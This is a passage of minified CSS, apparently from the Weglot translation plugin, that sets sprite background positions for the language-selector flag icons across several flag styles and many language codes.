0!important}.weglot-flags.flag-1.hw>a:before,.weglot-flags.flag-1.hw>span:before{background-position:-7840px 0!important}.weglot-flags.flag-1.fl>a:before,.weglot-flags.flag-1.fl>span:before{background-position:2560px 0!important}.weglot-flags.flag-1.af>a:before,.weglot-flags.flag-1.af>span:before{background-position:-6848px 0!important}.weglot-flags.flag-1.sq>a:before,.weglot-flags.flag-1.sq>span:before{background-position:-97px 0!important}.weglot-flags.flag-1.am>a:before,.weglot-flags.flag-1.am>span:before{background-position:-2369px 0!important}.weglot-flags.flag-1.ar>a:before,.weglot-flags.flag-1.ar>span:before{background-position:-6465px 0!important}.weglot-flags.flag-1.hy>a:before,.weglot-flags.flag-1.hy>span:before{background-position:-385px 0!important}.weglot-flags.flag-1.az>a:before,.weglot-flags.flag-1.az>span:before{background-position:-513px 0!important}.weglot-flags.flag-1.ba>a:before,.weglot-flags.flag-1.ba>span:before{background-position:-6113px 0!important}.weglot-flags.flag-1.eu>a:before,.weglot-flags.flag-1.eu>span:before{background-position:-8353px 0!important}.weglot-flags.flag-1.be>a:before,.weglot-flags.flag-1.be>span:before{background-position:-705px 0!important}.weglot-flags.flag-1.bn>a:before,.weglot-flags.flag-1.bn>span:before{background-position:-609px 0!important}.weglot-flags.flag-1.bs>a:before,.weglot-flags.flag-1.bs>span:before{background-position:-929px 0!important}.weglot-flags.flag-1.bg>a:before,.weglot-flags.flag-1.bg>span:before{background-position:-1121px 0!important}.weglot-flags.flag-1.br>a:before,.weglot-flags.flag-1.br>span:before{background-position:-993px 0!important}.weglot-flags.flag-1.my>a:before,.weglot-flags.flag-1.my>span:before{background-position:-4929px 0!important}.weglot-flags.flag-1.ca>a:before,.weglot-flags.flag-1.ca>span:before{background-position:-8321px 0!important}.weglot-flags.flag-1.zh>a:before,.weglot-flags.flag-1.zh>span:before{background-position:-1505px 0!important}.weglot-flags.flag-1.tw>a:before,.weglot-flags.flag-1.tw>span:before{background-position:-6369px 0!important}.weglot-flags.flag-1.km>a:before,.weglot-flags.flag-1.km>span:before{background-position:-1217px 0!important}.weglot-flags.flag-1.ny>a:before,.weglot-flags.flag-1.ny>span:before{background-position:-4289px 0!important}.weglot-flags.flag-1.co>a:before,.weglot-flags.flag-1.co>span:before{background-position:-2561px 0!important}.weglot-flags.flag-1.hr>a:before,.weglot-flags.flag-1.hr>span:before{background-position:-1793px 0!important}.weglot-flags.flag-1.cs>a:before,.weglot-flags.flag-1.cs>span:before{background-position:-1921px 0!important}.weglot-flags.flag-1.da>a:before,.weglot-flags.flag-1.da>span:before{background-position:-1985px 0!important}.weglot-flags.flag-1.nl>a:before,.weglot-flags.flag-1.nl>span:before{background-position:-5121px 0!important}.weglot-flags.flag-1.en>a:before,.weglot-flags.flag-1.en>span:before,.weglot-flags.flag-1.eo>a:before,.weglot-flags.flag-1.eo>span:before{background-position:-7777px 0!important}.weglot-flags.flag-1.et>a:before,.weglot-flags.flag-1.et>span:before{background-position:-2337px 0!important}.weglot-flags.flag-1.fj>a:before,.weglot-flags.flag-1.fj>span:before{background-position:-2497px 0!important}.weglot-flags.flag-1.fi>a:before,.weglot-flags.flag-1.fi>span:before{background-position:-2529px 0!important}.weglot-flags.flag-1.fr>a:before,.weglot-flags.flag-1.fr>span:before{background-position:-2561px 0!important}.weglot-flags.flag-1.gl>a:before,.weglot-flags.flag-1.gl>span:before{background-position:-8383px 0!important}.weglot-flags.flag-1.ka>a:before,.weglot-flags.flag-1.ka>span:before{background-position:-2721px 0!important}.weglot-flags.flag-1.de>a:before,.weglot-flags.flag-1.de>span:before{background-position:-2753px 0!important}.weglot-flags.flag-1.el>a:before,.weglot-flags.flag-1.el>span:before{background-position:-2881px 0!important}.weglot-flags.flag-1.gu>a:before,.weglot-flags.flag-1.gu>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.ht>a:before,.weglot-flags.flag-1.ht>span:before{background-position:-3169px 0!important}.weglot-flags.flag-1.ha>a:before,.weglot-flags.flag-1.ha>span:before{background-position:-5281px 0!important}.weglot-flags.flag-1.he>a:before,.weglot-flags.flag-1.he>span:before{background-position:-3521px 0!important}.weglot-flags.flag-1.hi>a:before,.weglot-flags.flag-1.hi>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.hu>a:before,.weglot-flags.flag-1.hu>span:before{background-position:-3265px 0!important}.weglot-flags.flag-1.is>a:before,.weglot-flags.flag-1.is>span:before{background-position:-3297px 0!important}.weglot-flags.flag-1.ig>a:before,.weglot-flags.flag-1.ig>span:before{background-position:-5313px 0!important}.weglot-flags.flag-1.id>a:before,.weglot-flags.flag-1.id>span:before{background-position:-3361px 0!important}.weglot-flags.flag-1.ga>a:before,.weglot-flags.flag-1.ga>span:before{background-position:-3457px 0!important}.weglot-flags.flag-1.it>a:before,.weglot-flags.flag-1.it>span:before{background-position:-3553px 0!important}.weglot-flags.flag-1.ja>a:before,.weglot-flags.flag-1.ja>span:before{background-position:-3617px 0!important}.weglot-flags.flag-1.jv>a:before,.weglot-flags.flag-1.jv>span:before{background-position:-4321px 0!important}.weglot-flags.flag-1.kn>a:before,.weglot-flags.flag-1.kn>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.kk>a:before,.weglot-flags.flag-1.kk>span:before{background-position:-3713px 0!important}.weglot-flags.flag-1.ko>a:before,.weglot-flags.flag-1.ko>span:before{background-position:-6913px 0!important}.weglot-flags.flag-1.ku>a:before,.weglot-flags.flag-1.ku>span:before{background-position:-3265px 0!important}.weglot-flags.flag-1.ky>a:before,.weglot-flags.flag-1.ky>span:before{background-position:-3873px 0!important}.weglot-flags.flag-1.lo>a:before,.weglot-flags.flag-1.lo>span:before{background-position:-3904px 0!important}.weglot-flags.flag-1.la>a:before,.weglot-flags.flag-1.la>span:before{background-position:-3553px 0!important}.weglot-flags.flag-1.lv>a:before,.weglot-flags.flag-1.lv>span:before{background-position:-3937px 0!important}.weglot-flags.flag-1.lt>a:before,.weglot-flags.flag-1.lt>span:before{background-position:-4129px 0!important}.weglot-flags.flag-1.lb>a:before,.weglot-flags.flag-1.lb>span:before{background-position:-4161px 0!important}.weglot-flags.flag-1.mk>a:before,.weglot-flags.flag-1.mk>span:before{background-position:-4225px 0!important}.weglot-flags.flag-1.mg>a:before,.weglot-flags.flag-1.mg>span:before{background-position:-4257px 0!important}.weglot-flags.flag-1.ms>a:before,.weglot-flags.flag-1.ms>span:before{background-position:-4321px 0!important}.weglot-flags.flag-1.ml>a:before,.weglot-flags.flag-1.ml>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.mt>a:before,.weglot-flags.flag-1.mt>span:before{background-position:-4417px 0!important}.weglot-flags.flag-1.mi>a:before,.weglot-flags.flag-1.mi>span:before{background-position:-5217px 0!important}.weglot-flags.flag-1.mr>a:before,.weglot-flags.flag-1.mr>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.mn>a:before,.weglot-flags.flag-1.mn>span:before{background-position:-4769px 0!important}.weglot-flags.flag-1.ne>a:before,.weglot-flags.flag-1.ne>span:before{background-position:-5091px 0!important}.weglot-flags.flag-1.no>a:before,.weglot-flags.flag-1.no>span:before{background-position:-5505px 0!important}.weglot-flags.flag-1.ps>a:before,.weglot-flags.flag-1.ps>span:before{background-position:-33px 0!important}.weglot-flags.flag-1.fa>a:before,.weglot-flags.flag-1.fa>span:before{background-position:-3393px 0!important}.weglot-flags.flag-1.pl>a:before,.weglot-flags.flag-1.pl>span:before{background-position:-5889px 0!important}.weglot-flags.flag-1.pt>a:before,.weglot-flags.flag-1.pt>span:before{background-position:-5921px 0!important}.weglot-flags.flag-1.pa>a:before,.weglot-flags.flag-1.pa>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.ro>a:before,.weglot-flags.flag-1.ro>span:before{background-position:-6081px 0!important}.weglot-flags.flag-1.ru>a:before,.weglot-flags.flag-1.ru>span:before{background-position:-6113px 0!important}.weglot-flags.flag-1.sm>a:before,.weglot-flags.flag-1.sm>span:before{background-position:-6369px 0!important}.weglot-flags.flag-1.gd>a:before,.weglot-flags.flag-1.gd>span:before{background-position:-6497px 0!important}.weglot-flags.flag-1.sr>a:before,.weglot-flags.flag-1.sr>span:before{background-position:-6561px 0!important}.weglot-flags.flag-1.sn>a:before,.weglot-flags.flag-1.sn>span:before{background-position:-8287px 0!important}.weglot-flags.flag-1.sd>a:before,.weglot-flags.flag-1.sd>span:before{background-position:-5601px 0!important}.weglot-flags.flag-1.si>a:before,.weglot-flags.flag-1.si>span:before{background-position:-7039px 0!important}.weglot-flags.flag-1.sk>a:before,.weglot-flags.flag-1.sk>span:before{background-position:-6689px 0!important}.weglot-flags.flag-1.sl>a:before,.weglot-flags.flag-1.sl>span:before{background-position:-6721px 0!important}.weglot-flags.flag-1.so>a:before,.weglot-flags.flag-1.so>span:before{background-position:-6785px 0!important}.weglot-flags.flag-1.st>a:before,.weglot-flags.flag-1.st>span:before{background-position:-4001px 0!important}.weglot-flags.flag-1.es>a:before,.weglot-flags.flag-1.es>span:before{background-position:-7009px 0!important}.weglot-flags.flag-1.su>a:before,.weglot-flags.flag-1.su>span:before{background-position:-7073px 0!important}.weglot-flags.flag-1.sw>a:before,.weglot-flags.flag-1.sw>span:before{background-position:-3745px 0!important}.weglot-flags.flag-1.sv>a:before,.weglot-flags.flag-1.sv>span:before{background-position:-7169px 0!important}.weglot-flags.flag-1.tl>a:before,.weglot-flags.flag-1.tl>span:before{background-position:-5823px 0!important}.weglot-flags.flag-1.ty>a:before,.weglot-flags.flag-1.ty>span:before{background-position:-2593px 0!important}.weglot-flags.flag-1.tg>a:before,.weglot-flags.flag-1.tg>span:before{background-position:-7297px 0!important}.weglot-flags.flag-1.ta>a:before,.weglot-flags.flag-1.ta>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.tt>a:before,.weglot-flags.flag-1.tt>span:before{background-position:-6113px 0!important}.weglot-flags.flag-1.te>a:before,.weglot-flags.flag-1.te>span:before{background-position:-3329px 0!important}.weglot-flags.flag-1.th>a:before,.weglot-flags.flag-1.th>span:before{background-position:-7361px 0!important}.weglot-flags.flag-1.to>a:before,.weglot-flags.flag-1.to>span:before{background-position:-7456px 0!important}.weglot-flags.flag-1.tr>a:before,.weglot-flags.flag-1.tr>span:before{background-position:-7553px 0!important}.weglot-flags.flag-1.uk>a:before,.weglot-flags.flag-1.uk>span:before{background-position:-7713px 0!important}.weglot-flags.flag-1.ur>a:before,.weglot-flags.flag-1.ur>span:before{background-position:-5600px 0!important}.weglot-flags.flag-1.uz>a:before,.weglot-flags.flag-1.uz>span:before{background-position:-7969px 0!important}.weglot-flags.flag-1.vi>a:before,.weglot-flags.flag-1.vi>span:before{background-position:-8097px 0!important}.weglot-flags.flag-1.cy>a:before,.weglot-flags.flag-1.cy>span:before{background-position:-8129px 0!important}.weglot-flags.flag-1.fy>a:before,.weglot-flags.flag-1.fy>span:before{background-position:-5121px 0!important}.weglot-flags.flag-1.xh>a:before,.weglot-flags.flag-1.xh>span:before{background-position:-6848px 0!important}.weglot-flags.flag-1.yi>a:before,.weglot-flags.flag-1.yi>span:before{background-position:-3521px 0!important}.weglot-flags.flag-1.yo>a:before,.weglot-flags.flag-1.yo>span:before{background-position:-5313px 0!important}.weglot-flags.flag-1.zu>a:before,.weglot-flags.flag-1.zu>span:before{background-position:-6848px 0!important}.weglot-flags.flag-2.hw>a:before,.weglot-flags.flag-2.hw>span:before{background-position:-5448px 0!important}.weglot-flags.flag-2.fl>a:before,.weglot-flags.flag-2.fl>span:before{background-position:-1008px 0!important}.weglot-flags.flag-2.af>a:before,.weglot-flags.flag-2.af>span:before{background-position:-4968px 0!important}.weglot-flags.flag-2.sq>a:before,.weglot-flags.flag-2.sq>span:before{background-position:-2976px 0!important}.weglot-flags.flag-2.am>a:before,.weglot-flags.flag-2.am>span:before{background-position:-3816px 0!important}.weglot-flags.flag-2.ar>a:before,.weglot-flags.flag-2.ar>span:before{background-position:-768px 0!important}.weglot-flags.flag-2.hy>a:before,.weglot-flags.flag-2.hy>span:before{background-position:0 0!important}.weglot-flags.flag-2.az>a:before,.weglot-flags.flag-2.az>span:before{background-position:-5136px 0!important}.weglot-flags.flag-2.ba>a:before,.weglot-flags.flag-2.ba>span:before{background-position:-936px 0!important}.weglot-flags.flag-2.eu>a:before,.weglot-flags.flag-2.eu>span:before{background-position:-5376px 0!important}.weglot-flags.flag-2.be>a:before,.weglot-flags.flag-2.be>span:before{background-position:-4224px 0!important}.weglot-flags.flag-2.bn>a:before,.weglot-flags.flag-2.bn>span:before{background-position:-4056px 0!important}.weglot-flags.flag-2.bs>a:before,.weglot-flags.flag-2.bs>span:before{background-position:-3984px 0!important}.weglot-flags.flag-2.bg>a:before,.weglot-flags.flag-2.bg>span:before{background-position:-5040px 0!important}.weglot-flags.flag-2.br>a:before,.weglot-flags.flag-2.br>span:before{background-position:-2784px 0!important}.weglot-flags.flag-2.my>a:before,.weglot-flags.flag-2.my>span:before{background-position:-1248px 0!important}.weglot-flags.flag-2.ca>a:before,.weglot-flags.flag-2.ca>span:before{background-position:-5352px 0!important}.weglot-flags.flag-2.zh>a:before,.weglot-flags.flag-2.zh>span:before{background-position:-2592px 0!important}.weglot-flags.flag-2.tw>a:before,.weglot-flags.flag-2.tw>span:before{background-position:-3408px 0!important}.weglot-flags.flag-2.km>a:before,.weglot-flags.flag-2.km>span:before{background-position:-5160px 0!important}.weglot-flags.flag-2.ny>a:before,.weglot-flags.flag-2.ny>span:before{background-position:-1392px 0!important}.weglot-flags.flag-2.co>a:before,.weglot-flags.flag-2.co>span:before{background-position:-2304px 0!important}.weglot-flags.flag-2.hr>a:before,.weglot-flags.flag-2.hr>span:before{background-position:-4416px 0!important}.weglot-flags.flag-2.cs>a:before,.weglot-flags.flag-2.cs>span:before{background-position:-2472px 0!important}.weglot-flags.flag-2.da>a:before,.weglot-flags.flag-2.da>span:before{background-position:-2448px 0!important}.weglot-flags.flag-2.nl>a:before,.weglot-flags.flag-2.nl>span:before{background-position:-1296px 0!important}.weglot-flags.flag-2.en>a:before,.weglot-flags.flag-2.en>span:before,.weglot-flags.flag-2.eo>a:before,.weglot-flags.flag-2.eo>span:before{background-position:-312px 0!important}.weglot-flags.flag-2.et>a:before,.weglot-flags.flag-2.et>span:before{background-position:-2424px 0!important}.weglot-flags.flag-2.fj>a:before,.weglot-flags.flag-2.fj>span:before{background-position:-576px 0!important}.weglot-flags.flag-2.fi>a:before,.weglot-flags.flag-2.fi>span:before{background-position:-2328px 0!important}.weglot-flags.flag-2.fr>a:before,.weglot-flags.flag-2.fr>span:before{background-position:-2304px 0!important}.weglot-flags.flag-2.gl>a:before,.weglot-flags.flag-2.gl>span:before{background-position:-5400px 0!important}.weglot-flags.flag-2.ka>a:before,.weglot-flags.flag-2.ka>span:before{background-position:-3744px 0!important}.weglot-flags.flag-2.de>a:before,.weglot-flags.flag-2.de>span:before{background-position:-2256px 0!important}.weglot-flags.flag-2.el>a:before,.weglot-flags.flag-2.el>span:before{background-position:-2208px 0!important}.weglot-flags.flag-2.gu>a:before,.weglot-flags.flag-2.gu>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.ht>a:before,.weglot-flags.flag-2.ht>span:before{background-position:-3528px 0!important}.weglot-flags.flag-2.ha>a:before,.weglot-flags.flag-2.ha>span:before{background-position:-1176px 0!important}.weglot-flags.flag-2.he>a:before,.weglot-flags.flag-2.he>span:before{background-position:-1992px 0!important}.weglot-flags.flag-2.hi>a:before,.weglot-flags.flag-2.hi>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.hu>a:before,.weglot-flags.flag-2.hu>span:before{background-position:-2088px 0!important}.weglot-flags.flag-2.is>a:before,.weglot-flags.flag-2.is>span:before{background-position:-2064px 0!important}.weglot-flags.flag-2.ig>a:before,.weglot-flags.flag-2.ig>span:before{background-position:-1103px 0!important}.weglot-flags.flag-2.id>a:before,.weglot-flags.flag-2.id>span:before{background-position:-2040px 0!important}.weglot-flags.flag-2.ga>a:before,.weglot-flags.flag-2.ga>span:before{background-position:-2016px 0!important}.weglot-flags.flag-2.it>a:before,.weglot-flags.flag-2.it>span:before{background-position:-1968px 0!important}.weglot-flags.flag-2.ja>a:before,.weglot-flags.flag-2.ja>span:before{background-position:-1920px 0!important}.weglot-flags.flag-2.jv>a:before,.weglot-flags.flag-2.jv>span:before{background-position:-1536px 0!important}.weglot-flags.flag-2.kn>a:before,.weglot-flags.flag-2.kn>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.kk>a:before,.weglot-flags.flag-2.kk>span:before{background-position:-1704px 0!important}.weglot-flags.flag-2.ko>a:before,.weglot-flags.flag-2.ko>span:before{background-position:-1848px 0!important}.weglot-flags.flag-2.ku>a:before,.weglot-flags.flag-2.ku>span:before{background-position:-2088px 0!important}.weglot-flags.flag-2.ky>a:before,.weglot-flags.flag-2.ky>span:before{background-position:-1800px 0!important}.weglot-flags.flag-2.lo>a:before,.weglot-flags.flag-2.lo>span:before{background-position:-1776px 0!important}.weglot-flags.flag-2.la>a:before,.weglot-flags.flag-2.la>span:before{background-position:-1968px 0!important}.weglot-flags.flag-2.lv>a:before,.weglot-flags.flag-2.lv>span:before{background-position:-1752px 0!important}.weglot-flags.flag-2.lt>a:before,.weglot-flags.flag-2.lt>span:before{background-position:-1656px 0!important}.weglot-flags.flag-2.lb>a:before,.weglot-flags.flag-2.lb>span:before{background-position:-1632px 0!important}.weglot-flags.flag-2.mk>a:before,.weglot-flags.flag-2.mk>span:before{background-position:-1440px 0!important}.weglot-flags.flag-2.mg>a:before,.weglot-flags.flag-2.mg>span:before{background-position:-1560px 0!important}.weglot-flags.flag-2.ms>a:before,.weglot-flags.flag-2.ms>span:before{background-position:-1536px 0!important}.weglot-flags.flag-2.ml>a:before,.weglot-flags.flag-2.ml>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.mt>a:before,.weglot-flags.flag-2.mt>span:before{background-position:-1200px 0!important}.weglot-flags.flag-2.mi>a:before,.weglot-flags.flag-2.mi>span:before{background-position:-1224px 0!important}.weglot-flags.flag-2.mr>a:before,.weglot-flags.flag-2.mr>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.mn>a:before,.weglot-flags.flag-2.mn>span:before{background-position:-4800px 0!important}.weglot-flags.flag-2.ne>a:before,.weglot-flags.flag-2.ne>span:before{background-position:-1320px 0!important}.weglot-flags.flag-2.no>a:before,.weglot-flags.flag-2.no>span:before{background-position:-4776px 0!important}.weglot-flags.flag-2.ps>a:before,.weglot-flags.flag-2.ps>span:before{background-position:-4008px 0!important}.weglot-flags.flag-2.fa>a:before,.weglot-flags.flag-2.fa>span:before{background-position:-5088px 0!important}.weglot-flags.flag-2.pl>a:before,.weglot-flags.flag-2.pl>span:before{background-position:-984px 0!important}.weglot-flags.flag-2.pt>a:before,.weglot-flags.flag-2.pt>span:before{background-position:-528px 0!important}.weglot-flags.flag-2.pa>a:before,.weglot-flags.flag-2.pa>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.ro>a:before,.weglot-flags.flag-2.ro>span:before{background-position:-960px 0!important}.weglot-flags.flag-2.ru>a:before,.weglot-flags.flag-2.ru>span:before{background-position:-936px 0!important}.weglot-flags.flag-2.sm>a:before,.weglot-flags.flag-2.sm>span:before{background-position:-3408px 0!important}.weglot-flags.flag-2.gd>a:before,.weglot-flags.flag-2.gd>span:before{background-position:-4872px 0!important}.weglot-flags.flag-2.sr>a:before,.weglot-flags.flag-2.sr>span:before{background-position:-3120px 0!important}.weglot-flags.flag-2.sn>a:before,.weglot-flags.flag-2.sn>span:before{background-position:-72px 0!important}.weglot-flags.flag-2.sd>a:before,.weglot-flags.flag-2.sd>span:before{background-position:-1128px 0!important}.weglot-flags.flag-2.si>a:before,.weglot-flags.flag-2.si>span:before{background-position:-480px 0!important}.weglot-flags.flag-2.sk>a:before,.weglot-flags.flag-2.sk>span:before{background-position:-4152px 0!important}.weglot-flags.flag-2.sl>a:before,.weglot-flags.flag-2.sl>span:before{background-position:-696px 0!important}.weglot-flags.flag-2.so>a:before,.weglot-flags.flag-2.so>span:before{background-position:-3336px 0!important}.weglot-flags.flag-2.st>a:before,.weglot-flags.flag-2.st>span:before{background-position:-3552px 0!important}.weglot-flags.flag-2.es>a:before,.weglot-flags.flag-2.es>span:before{background-position:-96px 0!important}.weglot-flags.flag-2.su>a:before,.weglot-flags.flag-2.su>span:before{background-position:-3312px 0!important}.weglot-flags.flag-2.sw>a:before,.weglot-flags.flag-2.sw>span:before{background-position:-1872px 0!important}.weglot-flags.flag-2.sv>a:before,.weglot-flags.flag-2.sv>span:before{background-position:-552px 0!important}.weglot-flags.flag-2.tl>a:before,.weglot-flags.flag-2.tl>span:before{background-position:-1008px 0!important}.weglot-flags.flag-2.ty>a:before,.weglot-flags.flag-2.ty>span:before{background-position:-4512px 0!important}.weglot-flags.flag-2.tg>a:before,.weglot-flags.flag-2.tg>span:before{background-position:-264px 0!important}.weglot-flags.flag-2.ta>a:before,.weglot-flags.flag-2.ta>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.tt>a:before,.weglot-flags.flag-2.tt>span:before{background-position:-936px 0!important}.weglot-flags.flag-2.te>a:before,.weglot-flags.flag-2.te>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.th>a:before,.weglot-flags.flag-2.th>span:before{background-position:-456px 0!important}.weglot-flags.flag-2.to>a:before,.weglot-flags.flag-2.to>span:before{background-position:-3264px 0!important}.weglot-flags.flag-2.tr>a:before,.weglot-flags.flag-2.tr>span:before{background-position:-360px 0!important}.weglot-flags.flag-2.uk>a:before,.weglot-flags.flag-2.uk>span:before{background-position:-288px 0!important}.weglot-flags.flag-2.ur>a:before,.weglot-flags.flag-2.ur>span:before{background-position:-1128px 0!important}.weglot-flags.flag-2.uz>a:before,.weglot-flags.flag-2.uz>span:before{background-position:-240px 0!important}.weglot-flags.flag-2.vi>a:before,.weglot-flags.flag-2.vi>span:before{background-position:-144px 0!important}.weglot-flags.flag-2.cy>a:before,.weglot-flags.flag-2.cy>span:before{background-position:-4848px 0!important}.weglot-flags.flag-2.fy>a:before,.weglot-flags.flag-2.fy>span:before{background-position:-1296px 0!important}.weglot-flags.flag-2.xh>a:before,.weglot-flags.flag-2.xh>span:before{background-position:-4968px 0!important}.weglot-flags.flag-2.yi>a:before,.weglot-flags.flag-2.yi>span:before{background-position:-1992px 0!important}.weglot-flags.flag-2.yo>a:before,.weglot-flags.flag-2.yo>span:before{background-position:-1103px 0!important}.weglot-flags.flag-2.zu>a:before,.weglot-flags.flag-2.zu>span:before{background-position:-4968px 0!important}.weglot-flags.flag-3.hw>a:before,.weglot-flags.flag-3.hw>span:before{background-position:-2711px 0!important}.weglot-flags.flag-3.fl>a:before,.weglot-flags.flag-3.fl>span:before{background-position:-5232px 0!important}.weglot-flags.flag-3.af>a:before,.weglot-flags.flag-3.af>span:before{background-position:-5496px 0!important}.weglot-flags.flag-3.sq>a:before,.weglot-flags.flag-3.sq>span:before{background-position:-4776px 0!important}.weglot-flags.flag-3.am>a:before,.weglot-flags.flag-3.am>span:before{background-position:-192px 0!important}.weglot-flags.flag-3.ar>a:before,.weglot-flags.flag-3.ar>span:before{background-position:-3336px 0!important}.weglot-flags.flag-3.hy>a:before,.weglot-flags.flag-3.hy>span:before{background-position:-4632px 0!important}.weglot-flags.flag-3.az>a:before,.weglot-flags.flag-3.az>span:before{background-position:-4536px 0!important}.weglot-flags.flag-3.ba>a:before,.weglot-flags.flag-3.ba>span:before{background-position:-2664px 0!important}.weglot-flags.flag-3.eu>a:before,.weglot-flags.flag-3.eu>span:before{background-position:-5808px 0!important}.weglot-flags.flag-3.be>a:before,.weglot-flags.flag-3.be>span:before{background-position:-144px 0!important}.weglot-flags.flag-3.bn>a:before,.weglot-flags.flag-3.bn>span:before{background-position:-4488px 0!important}.weglot-flags.flag-3.bs>a:before,.weglot-flags.flag-3.bs>span:before{background-position:-4392px 0!important}.weglot-flags.flag-3.bg>a:before,.weglot-flags.flag-3.bg>span:before{background-position:-4296px 0!important}.weglot-flags.flag-3.br>a:before,.weglot-flags.flag-3.br>span:before{background-position:-4344px 0!important}.weglot-flags.flag-3.my>a:before,.weglot-flags.flag-3.my>span:before{background-position:-3769px 0!important}.weglot-flags.flag-3.ca>a:before,.weglot-flags.flag-3.ca>span:before{background-position:-5784px 0!important}.weglot-flags.flag-3.zh>a:before,.weglot-flags.flag-3.zh>span:before{background-position:-3240px 0!important}.weglot-flags.flag-3.tw>a:before,.weglot-flags.flag-3.tw>span:before{background-position:-4008px 0!important}.weglot-flags.flag-3.km>a:before,.weglot-flags.flag-3.km>span:before{background-position:-4201px 0!important}.weglot-flags.flag-3.ny>a:before,.weglot-flags.flag-3.ny>span:before{background-position:-384px 0!important}.weglot-flags.flag-3.co>a:before,.weglot-flags.flag-3.co>span:before{background-position:-2760px 0!important}.weglot-flags.flag-3.hr>a:before,.weglot-flags.flag-3.hr>span:before{background-position:-3048px 0!important}.weglot-flags.flag-3.cs>a:before,.weglot-flags.flag-3.cs>span:before{background-position:-5280px 0!important}.weglot-flags.flag-3.da>a:before,.weglot-flags.flag-3.da>span:before{background-position:-3024px 0!important}.weglot-flags.flag-3.nl>a:before,.weglot-flags.flag-3.nl>span:before{background-position:-3360px 0!important}.weglot-flags.flag-3.en>a:before,.weglot-flags.flag-3.en>span:before,.weglot-flags.flag-3.eo>a:before,.weglot-flags.flag-3.eo>span:before{background-position:-2520px 0!important}.weglot-flags.flag-3.et>a:before,.weglot-flags.flag-3.et>span:before{background-position:-2856px 0!important}.weglot-flags.flag-3.fj>a:before,.weglot-flags.flag-3.fj>span:before{background-position:0 0!important}.weglot-flags.flag-3.fi>a:before,.weglot-flags.flag-3.fi>span:before{background-position:-2784px 0!important}.weglot-flags.flag-3.fr>a:before,.weglot-flags.flag-3.fr>span:before{background-position:-2760px 0!important}.weglot-flags.flag-3.gl>a:before,.weglot-flags.flag-3.gl>span:before{background-position:-5832px 0!important}.weglot-flags.flag-3.ka>a:before,.weglot-flags.flag-3.ka>span:before{background-position:-1536px 0!important}.weglot-flags.flag-3.de>a:before,.weglot-flags.flag-3.de>span:before{background-position:-1488px 0!important}.weglot-flags.flag-3.el>a:before,.weglot-flags.flag-3.el>span:before{background-position:-1416px 0!important}.weglot-flags.flag-3.gu>a:before,.weglot-flags.flag-3.gu>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.ht>a:before,.weglot-flags.flag-3.ht>span:before{background-position:-5160px 0!important}.weglot-flags.flag-3.ha>a:before,.weglot-flags.flag-3.ha>span:before{background-position:-361px 0!important}.weglot-flags.flag-3.he>a:before,.weglot-flags.flag-3.he>span:before{background-position:-1608px 0!important}.weglot-flags.flag-3.hi>a:before,.weglot-flags.flag-3.hi>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.hu>a:before,.weglot-flags.flag-3.hu>span:before{background-position:-1920px 0!important}.weglot-flags.flag-3.is>a:before,.weglot-flags.flag-3.is>span:before{background-position:-840px 0!important}.weglot-flags.flag-3.ig>a:before,.weglot-flags.flag-3.ig>span:before{background-position:-3457px 0!important}.weglot-flags.flag-3.id>a:before,.weglot-flags.flag-3.id>span:before{background-position:-4992px 0!important}.weglot-flags.flag-3.ga>a:before,.weglot-flags.flag-3.ga>span:before{background-position:-2016px 0!important}.weglot-flags.flag-3.it>a:before,.weglot-flags.flag-3.it>span:before{background-position:-336px 0!important}.weglot-flags.flag-3.ja>a:before,.weglot-flags.flag-3.ja>span:before{background-position:-2448px 0!important}.weglot-flags.flag-3.jv>a:before,.weglot-flags.flag-3.jv>span:before{background-position:-864px 0!important}.weglot-flags.flag-3.kn>a:before,.weglot-flags.flag-3.kn>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.kk>a:before,.weglot-flags.flag-3.kk>span:before{background-position:-3912px 0!important}.weglot-flags.flag-3.ko>a:before,.weglot-flags.flag-3.ko>span:before{background-position:-2256px 0!important}.weglot-flags.flag-3.ku>a:before,.weglot-flags.flag-3.ku>span:before{background-position:-1920px 0!important}.weglot-flags.flag-3.ky>a:before,.weglot-flags.flag-3.ky>span:before{background-position:-744px 0!important}.weglot-flags.flag-3.lo>a:before,.weglot-flags.flag-3.lo>span:before{background-position:-3816px 0!important}.weglot-flags.flag-3.la>a:before,.weglot-flags.flag-3.la>span:before{background-position:-336px 0!important}.weglot-flags.flag-3.lv>a:before,.weglot-flags.flag-3.lv>span:before{background-position:-216px 0!important}.weglot-flags.flag-3.lt>a:before,.weglot-flags.flag-3.lt>span:before{background-position:-1776px 0!important}.weglot-flags.flag-3.lb>a:before,.weglot-flags.flag-3.lb>span:before{background-position:-1945px 0!important}.weglot-flags.flag-3.mk>a:before,.weglot-flags.flag-3.mk>span:before{background-position:-2208px 0!important}.weglot-flags.flag-3.mg>a:before,.weglot-flags.flag-3.mg>span:before{background-position:-5064px 0!important}.weglot-flags.flag-3.ms>a:before,.weglot-flags.flag-3.ms>span:before{background-position:-864px 0!important}.weglot-flags.flag-3.ml>a:before,.weglot-flags.flag-3.ml>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.mt>a:before,.weglot-flags.flag-3.mt>span:before{background-position:-4920px 0!important}.weglot-flags.flag-3.mi>a:before,.weglot-flags.flag-3.mi>span:before{background-position:-2113px 0!important}.weglot-flags.flag-3.mr>a:before,.weglot-flags.flag-3.mr>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.mn>a:before,.weglot-flags.flag-3.mn>span:before{background-position:-24px 0!important}.weglot-flags.flag-3.ne>a:before,.weglot-flags.flag-3.ne>span:before{background-position:-5642px 0!important}.weglot-flags.flag-3.no>a:before,.weglot-flags.flag-3.no>span:before{background-position:-984px 